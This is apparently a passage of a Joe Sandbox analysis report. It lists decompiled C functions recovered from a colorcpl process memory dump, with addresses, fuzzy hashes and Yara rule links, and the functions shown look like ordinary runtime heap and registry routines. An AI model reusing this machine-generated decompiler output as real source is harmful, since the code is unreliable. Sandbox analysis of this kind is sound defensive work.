				_t81 = E06E93971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E06E93884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E06E5FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E06E59650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E06E93787(_a4,  &_v352, _t80);
						}
					}
					L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E06E595D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                                                                                0x06e93552
                                                                                                0x06e9355a
                                                                                                0x06e9355d
                                                                                                0x06e93566
                                                                                                0x06e93567
                                                                                                0x06e9357e
                                                                                                0x06e9358f
                                                                                                0x06e935a1
                                                                                                0x06e935a5
                                                                                                0x06e9366b
                                                                                                0x06e9366b
                                                                                                0x06e9366d
                                                                                                0x06e93672
                                                                                                0x06e93679
                                                                                                0x06e93685
                                                                                                0x06e9368d
                                                                                                0x06e9369d
                                                                                                0x06e936a7
                                                                                                0x06e936b8
                                                                                                0x06e936c6
                                                                                                0x06e936c7
                                                                                                0x06e936dc
                                                                                                0x06e936e1
                                                                                                0x06e936e7
                                                                                                0x06e936e9
                                                                                                0x06e936e9
                                                                                                0x06e93703
                                                                                                0x06e93703
                                                                                                0x06e935b5
                                                                                                0x06e935c0
                                                                                                0x06e935c4
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e935ca
                                                                                                0x06e935d7
                                                                                                0x06e935e2
                                                                                                0x06e935e6
                                                                                                0x06e935e8
                                                                                                0x06e935f5
                                                                                                0x06e935fa
                                                                                                0x06e93603
                                                                                                0x06e93604
                                                                                                0x06e93609
                                                                                                0x06e9360a
                                                                                                0x06e93612
                                                                                                0x06e93613
                                                                                                0x06e9361e
                                                                                                0x06e93622
                                                                                                0x06e93628
                                                                                                0x06e9362f
                                                                                                0x06e9362f
                                                                                                0x06e93636
                                                                                                0x06e93638
                                                                                                0x06e9363b
                                                                                                0x06e93642
                                                                                                0x06e93642
                                                                                                0x06e93636
                                                                                                0x06e93657
                                                                                                0x06e93657
                                                                                                0x06e9365c
                                                                                                0x06e93662
                                                                                                0x06e93669
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: BinaryHash
                                                                                                • API String ID: 0-2202222882
                                                                                                • Opcode ID: af034e99f0ff8e2bbbfa1f4eebeda4dd39eaf5494e857f2e356e69ba5cd3d2bc
                                                                                                • Instruction ID: 14929eaa653099a61beee772ac4f7f3f994acd90343d311853c196030a974203
                                                                                                • Opcode Fuzzy Hash: af034e99f0ff8e2bbbfa1f4eebeda4dd39eaf5494e857f2e356e69ba5cd3d2bc
                                                                                                • Instruction Fuzzy Hash: B24164B1D1062C9BDFA1DA50CC84FEEB77CAF44714F0155A5EA19AB241DB309E88CFA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06EE05AC Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 71%
                                                                                                			E06EE05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E06EE07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E06E59730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E06EDA80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E06EDA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E06EE1293(_t79, _v40, E06EE07DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E06E37D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E06ED138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                                                                                0x06ee05c5
                                                                                                0x06ee05ca
                                                                                                0x06ee05d3
                                                                                                0x06ee06db
                                                                                                0x06ee06db
                                                                                                0x06ee06dd
                                                                                                0x06ee06e3
                                                                                                0x06ee06e3
                                                                                                0x06ee05dd
                                                                                                0x06ee05e7
                                                                                                0x06ee05f6
                                                                                                0x06ee0600
                                                                                                0x06ee0607
                                                                                                0x06ee0610
                                                                                                0x06ee0615
                                                                                                0x06ee061a
                                                                                                0x06ee061c
                                                                                                0x06ee061e
                                                                                                0x06ee0624
                                                                                                0x06ee0625
                                                                                                0x06ee0627
                                                                                                0x06ee0628
                                                                                                0x06ee0631
                                                                                                0x06ee0640
                                                                                                0x06ee064d
                                                                                                0x06ee0654
                                                                                                0x06ee0654
                                                                                                0x06ee0631
                                                                                                0x06ee066d
                                                                                                0x06ee0674
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ee0692
                                                                                                0x06ee069e
                                                                                                0x06ee06b0
                                                                                                0x06ee06a0
                                                                                                0x06ee06a9
                                                                                                0x06ee06a9
                                                                                                0x06ee06b8
                                                                                                0x06ee06d6
                                                                                                0x06ee06d6
                                                                                                0x00000000

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `
                                                                                                • API String ID: 0-2679148245
                                                                                                • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                                • Instruction ID: a3aec3e083f7f229f0f9d193273559521bae92f7bc4d2a885626d0b15cbb9edd
                                                                                                • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                                • Instruction Fuzzy Hash: 103104326003466BE7A0DE24CC44F9B77D9EBC4758F045229F9549B6C0D7B0E954CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E4A61C Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 78%
                                                                                                			E06E4A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x6ef0220);
				E06E6D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x6f07b9c; // 0x0
				_t55 = L06E34620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E06E6D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x6f07b10 =  *0x6f07b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x6f0536c; // 0xe42918
					if( *_t51 != 0x6f05368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x6f05368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x6f0536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E06E4A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                                                                                                0x06e4a61c
                                                                                                0x06e4a61e
                                                                                                0x06e4a623
                                                                                                0x06e4a628
                                                                                                0x06e4a62b
                                                                                                0x06e4a62d
                                                                                                0x06e4a648
                                                                                                0x06e4a64a
                                                                                                0x06e4a64f
                                                                                                0x06e89b44
                                                                                                0x06e4a6ec
                                                                                                0x06e4a6f1
                                                                                                0x06e4a6f1
                                                                                                0x06e4a655
                                                                                                0x06e4a657
                                                                                                0x06e4a65a
                                                                                                0x06e4a65d
                                                                                                0x06e4a662
                                                                                                0x06e4a663
                                                                                                0x06e4a667
                                                                                                0x06e4a668
                                                                                                0x06e4a66d
                                                                                                0x06e4a706
                                                                                                0x06e4a706
                                                                                                0x06e89bda
                                                                                                0x06e89be6
                                                                                                0x06e89beb
                                                                                                0x00000000
                                                                                                0x06e89beb
                                                                                                0x06e4a679
                                                                                                0x06e89b7a
                                                                                                0x00000000
                                                                                                0x06e89b7a
                                                                                                0x06e4a683
                                                                                                0x06e4a6f4
                                                                                                0x06e4a6f7
                                                                                                0x06e4a6f9
                                                                                                0x06e4a6fd
                                                                                                0x06e4a6a0
                                                                                                0x06e4a6a0
                                                                                                0x06e4a6ad
                                                                                                0x06e4a6af
                                                                                                0x06e4a6b4
                                                                                                0x06e89ba7
                                                                                                0x06e89bac
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e89bc6
                                                                                                0x06e89bce
                                                                                                0x06e89bd1
                                                                                                0x06e89bd3
                                                                                                0x06e89bd3
                                                                                                0x00000000
                                                                                                0x06e89bd1
                                                                                                0x06e4a6bd
                                                                                                0x06e4a6c3
                                                                                                0x06e4a6c6
                                                                                                0x06e4a6d2
                                                                                                0x06e4a701
                                                                                                0x06e4a704
                                                                                                0x00000000
                                                                                                0x06e4a704
                                                                                                0x06e4a6d4
                                                                                                0x06e4a6d6
                                                                                                0x06e4a6d9
                                                                                                0x06e4a6db
                                                                                                0x06e4a6e1
                                                                                                0x06e4a6e6
                                                                                                0x06e4a6e8
                                                                                                0x06e4a6e8
                                                                                                0x06e4a6ea
                                                                                                0x00000000
                                                                                                0x06e4a6ea
                                                                                                0x06e4a688
                                                                                                0x06e4a692
                                                                                                0x06e4a694
                                                                                                0x06e4a699
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e4a69d
                                                                                                0x00000000

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: >
                                                                                                • API String ID: 0-260571596
                                                                                                • Opcode ID: 66ea97d04ae221e93329353c4d3fd5529bfcbb6aad8d1a883103224c7e84bf58
                                                                                                • Instruction ID: e5adebf0ebd4c7c44e2d6573639264bc0547818656848bbaac4d9f3dbc2621ff
                                                                                                • Opcode Fuzzy Hash: 66ea97d04ae221e93329353c4d3fd5529bfcbb6aad8d1a883103224c7e84bf58
                                                                                                • Instruction Fuzzy Hash: FC419D75E44304DFDB94DF6CD880BA9B7F2BF48314F1590A9E808AB349C374A900CB94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E93884 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 72%
                                                                                                			E06E93884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E06E59650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L06E34620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E06E59650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                                                                                0x06e93893
                                                                                                0x06e93896
                                                                                                0x06e93899
                                                                                                0x06e9389f
                                                                                                0x06e938a0
                                                                                                0x06e938a4
                                                                                                0x06e938a9
                                                                                                0x06e938ac
                                                                                                0x06e938ad
                                                                                                0x06e938ae
                                                                                                0x06e938af
                                                                                                0x06e938b1
                                                                                                0x06e938b4
                                                                                                0x06e938bb
                                                                                                0x06e938bc
                                                                                                0x06e938bd
                                                                                                0x06e938c4
                                                                                                0x06e938c8
                                                                                                0x06e938ca
                                                                                                0x06e938ca
                                                                                                0x06e938d5
                                                                                                0x06e9393e
                                                                                                0x06e93940
                                                                                                0x06e93942
                                                                                                0x06e93952
                                                                                                0x06e93954
                                                                                                0x06e93961
                                                                                                0x06e93961
                                                                                                0x06e93967
                                                                                                0x06e9396e
                                                                                                0x06e9396e
                                                                                                0x06e93947
                                                                                                0x06e9394c
                                                                                                0x00000000
                                                                                                0x06e9394c
                                                                                                0x06e938ea
                                                                                                0x06e938ee
                                                                                                0x06e938f8
                                                                                                0x06e938f9
                                                                                                0x06e938ff
                                                                                                0x06e93900
                                                                                                0x06e93902
                                                                                                0x06e93903
                                                                                                0x06e9390b
                                                                                                0x06e9390f
                                                                                                0x06e93950
                                                                                                0x00000000
                                                                                                0x06e93950
                                                                                                0x06e93915
                                                                                                0x06e9391d
                                                                                                0x06e9391d
                                                                                                0x06e93922
                                                                                                0x06e93926
                                                                                                0x00000000
                                                                                                0x06e93928
                                                                                                0x06e9392b
                                                                                                0x06e9392b
                                                                                                0x06e93935
                                                                                                0x06e93937
                                                                                                0x06e93937
                                                                                                0x00000000
                                                                                                0x06e93935
                                                                                                0x06e93926
                                                                                                0x06e938f0
                                                                                                0x00000000

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: BinaryName
                                                                                                • API String ID: 0-215506332
                                                                                                • Opcode ID: 3ea0645c8e2bb409a3d08ae9a254025b9690b945c60513909035ce7b94bbea6a
                                                                                                • Instruction ID: 3f7c01ff9a1a1beeeec3df15a3702031c4c289b224b4fb288e92110a5871fa8c
                                                                                                • Opcode Fuzzy Hash: 3ea0645c8e2bb409a3d08ae9a254025b9690b945c60513909035ce7b94bbea6a
                                                                                                • Instruction Fuzzy Hash: 5331BF72D00719AFEF659A58C945EBBB778EF80B24F115169E914A7290DB309E04C7E0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E4D294 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 33%
                                                                                                			E06E4D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x6f0d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E06E34120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E06E5B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E06E598D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E06E595D0();
					L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                                                                                0x06e4d29c
                                                                                                0x06e4d2a6
                                                                                                0x06e4d2b1
                                                                                                0x06e4d2b5
                                                                                                0x06e4d2b6
                                                                                                0x06e4d2bc
                                                                                                0x06e4d2bd
                                                                                                0x06e4d2be
                                                                                                0x06e4d2bf
                                                                                                0x06e4d2c2
                                                                                                0x06e4d2c4
                                                                                                0x06e4d2cc
                                                                                                0x06e4d384
                                                                                                0x06e4d34b
                                                                                                0x06e4d34f
                                                                                                0x06e4d350
                                                                                                0x06e4d351
                                                                                                0x06e4d35c
                                                                                                0x06e4d35c
                                                                                                0x06e4d2d6
                                                                                                0x06e4d2da
                                                                                                0x06e4d2e1
                                                                                                0x06e4d361
                                                                                                0x06e4d369
                                                                                                0x06e4d36d
                                                                                                0x06e4d2e3
                                                                                                0x06e4d2e3
                                                                                                0x06e4d2e3
                                                                                                0x06e4d2e5
                                                                                                0x06e4d2ed
                                                                                                0x06e4d2f5
                                                                                                0x06e4d2fa
                                                                                                0x06e4d302
                                                                                                0x06e4d303
                                                                                                0x06e4d30b
                                                                                                0x06e4d30f
                                                                                                0x06e4d313
                                                                                                0x06e4d318
                                                                                                0x06e4d31c
                                                                                                0x06e4d320
                                                                                                0x06e4d379
                                                                                                0x06e4d37d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e8affe
                                                                                                0x06e8b001
                                                                                                0x06e8b011
                                                                                                0x00000000
                                                                                                0x06e4d322
                                                                                                0x06e4d322
                                                                                                0x06e4d330
                                                                                                0x06e4d337
                                                                                                0x06e4d35d
                                                                                                0x06e4d339
                                                                                                0x06e4d33f
                                                                                                0x06e4d38c
                                                                                                0x06e4d38c
                                                                                                0x06e4d33f
                                                                                                0x06e4d349
                                                                                                0x00000000
                                                                                                0x06e4d349

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @
                                                                                                • API String ID: 0-2766056989
                                                                                                • Opcode ID: 05b5ca21166dc47163827420e085a63ced97249e580a8544d17c35b078628b66
                                                                                                • Instruction ID: 48f32e46b284a06790f2b671bf933a90ae41b4e5071302b5f93fd677fbefa997
                                                                                                • Opcode Fuzzy Hash: 05b5ca21166dc47163827420e085a63ced97249e580a8544d17c35b078628b66
                                                                                                • Instruction Fuzzy Hash: EA3191B19083059FD791EF28DD84AAFBBE8EF85654F00292EF99483250D634DD04CBD2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E21B8F Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 72%
                                                                                                			E06E21B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E06E5BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E06E5A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E06E5A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L06E34620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                                                                                0x06e21b8f
                                                                                                0x06e21b9a
                                                                                                0x06e21b9c
                                                                                                0x06e21b9e
                                                                                                0x06e21ba3
                                                                                                0x06e77010
                                                                                                0x06e77010
                                                                                                0x00000000
                                                                                                0x06e21ba9
                                                                                                0x06e21ba9
                                                                                                0x06e21bae
                                                                                                0x00000000
                                                                                                0x06e21bc5
                                                                                                0x06e21bca
                                                                                                0x06e21bcf
                                                                                                0x06e21bd0
                                                                                                0x06e21bd1
                                                                                                0x06e21bd2
                                                                                                0x06e21bd6
                                                                                                0x06e21bdc
                                                                                                0x06e21be0
                                                                                                0x06e76ffc
                                                                                                0x06e77000
                                                                                                0x00000000
                                                                                                0x06e77006
                                                                                                0x06e77009
                                                                                                0x06e77009
                                                                                                0x06e21be6
                                                                                                0x06e21bec
                                                                                                0x06e21c0b
                                                                                                0x06e21c0b
                                                                                                0x06e21c0c
                                                                                                0x06e21c11
                                                                                                0x06e21c12
                                                                                                0x06e21c15
                                                                                                0x06e21c1b
                                                                                                0x06e21c1f
                                                                                                0x06e21c31
                                                                                                0x06e21c33
                                                                                                0x06e77026
                                                                                                0x06e77026
                                                                                                0x06e21c21
                                                                                                0x06e21c24
                                                                                                0x06e21c24
                                                                                                0x06e21bee
                                                                                                0x06e21bee
                                                                                                0x06e21bf2
                                                                                                0x06e21c3a
                                                                                                0x06e21bf4
                                                                                                0x06e21bf4
                                                                                                0x06e21c05
                                                                                                0x06e21c05
                                                                                                0x06e21c09
                                                                                                0x06e21c3e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e21c09
                                                                                                0x06e21bec
                                                                                                0x06e21be0
                                                                                                0x06e21bae
                                                                                                0x06e21c2e

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
